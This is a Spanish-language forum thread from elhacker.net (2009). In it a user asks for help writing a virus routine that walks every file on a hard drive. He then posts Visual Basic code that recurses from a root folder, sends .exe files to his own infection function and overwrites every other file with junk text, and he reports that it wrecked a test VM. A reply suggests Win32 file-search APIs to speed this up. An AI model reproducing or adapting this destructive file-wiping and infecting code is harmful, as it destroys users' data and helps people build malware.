elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con una rutina
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con una rutina  (Leído 1,829 veces)
carlitrosss6

Desconectado Desconectado

Mensajes: 18


You know you're right.


Ver Perfil
Ayuda con una rutina
« en: 29 Mayo 2009, 21:04 pm »

Que pex.

Sòlo necesito saber como puedo hacer que todos los archivos del DD pasen por una variable (sName) uno por uno,para infectarlos o no,pero de eso me encargo yo.

Intente con algunos For y los controles DirListBox y FileListBox,pero no me resulta.

Alguna forma de hacer una busqueda completa de todos los archivos del DD,que no sea con  WSCRIPT?

Gracias!  ;D


En línea

Arriba Mèxico!!
cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Ayuda con una rutina
« Respuesta #1 en: 30 Mayo 2009, 00:40 am »

En
Citar
*http://www.recursosvisualbasic.com.ar/
encontraras ejemplos de lo que consultas, saludos!!


En línea

carlitrosss6

Desconectado Desconectado

Mensajes: 18


You know you're right.


Ver Perfil
Re: Ayuda con una rutina
« Respuesta #2 en: 30 Mayo 2009, 19:59 pm »

Cheque el sitio,pero mejor me quede con una funcion que adapte de un VBS que tenia por ahi,para no agrandar mucho el codigo jojo...

Código:
Private Function DoSearch(Path as String)

On Error Resume Next

Dim i
Dim fso As Object
Dim Folder, Archivos, Archivo, Subfolders, Subfolder


i = FreeFile
set fso = CreateObject("scripting.filesystemobject")
Set Folder = fso.getfolder(path)
Set Archivos = Folder.Files

For Each Archivo In Archivos

If ext(archivo.path) = ".exe" Then

Violar(archivo.path)  ' funciòn mia..

Else
 
 Open archivo.path For Output As #i
 Print #i, "blah blah blah!"
 Close #i
 End If
Next

Set Subfolders = Folder.Subfolders
For Each Subfolder In Subfolders
DoSearch Subfolder.path
Next

End Function
 

Con esta funciòn fue suficiente,la probè en VMware y un simple DoSearch("c:\") terminò bastante mal jaja...

Gracias,se ve que hay muy buenos programadores por aqui!.
En línea

Arriba Mèxico!!
XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: Ayuda con una rutina
« Respuesta #3 en: 31 Mayo 2009, 05:09 am »

Código
  1. Private Declare Function FindFirstFile Lib "kernel32" _
  2. Alias "FindFirstFileA" ( _
  3. ByVal lpFileName As String, _
  4. lpFindFileData As WIN32_FIND_DATA) As Long
  5.  
  6. Private Declare Function FindNextFile Lib "kernel32" _
  7. Alias "FindNextFileA" ( _
  8. ByVal hFind As Long, _
  9. lpFindFileData As WIN32_FIND_DATA) As Long

mira estas funciones son todo lo que necesitas, busca aqui en el foro hay bastante de esto
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Rutina de ejercicios? « 1 2 »
Foro Libre
Cergath 10 6,866 Último mensaje 27 Marzo 2012, 02:25 am
por Spider-Net
rutina para verificador ean 13 en mysql
Bases de Datos
heartless82 0 2,354 Último mensaje 20 Abril 2012, 22:00 pm
por heartless82
[Micro-rutina] strlen - ANSI « 1 2 »
ASM
Karcrack 13 7,539 Último mensaje 4 Abril 2013, 02:14 am
por mr.blood
Necesito una rutina para bloquear la APP ?
.NET (C#, VB.NET, ASP)
TrashAmbishion 4 2,634 Último mensaje 17 Febrero 2013, 22:32 pm
por TrashAmbishion
AYUDA RUTINA PARA TOUCH SCREEN
Programación C/C++
Virolay 1 1,729 Último mensaje 3 Octubre 2016, 18:49 pm
por dato000
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines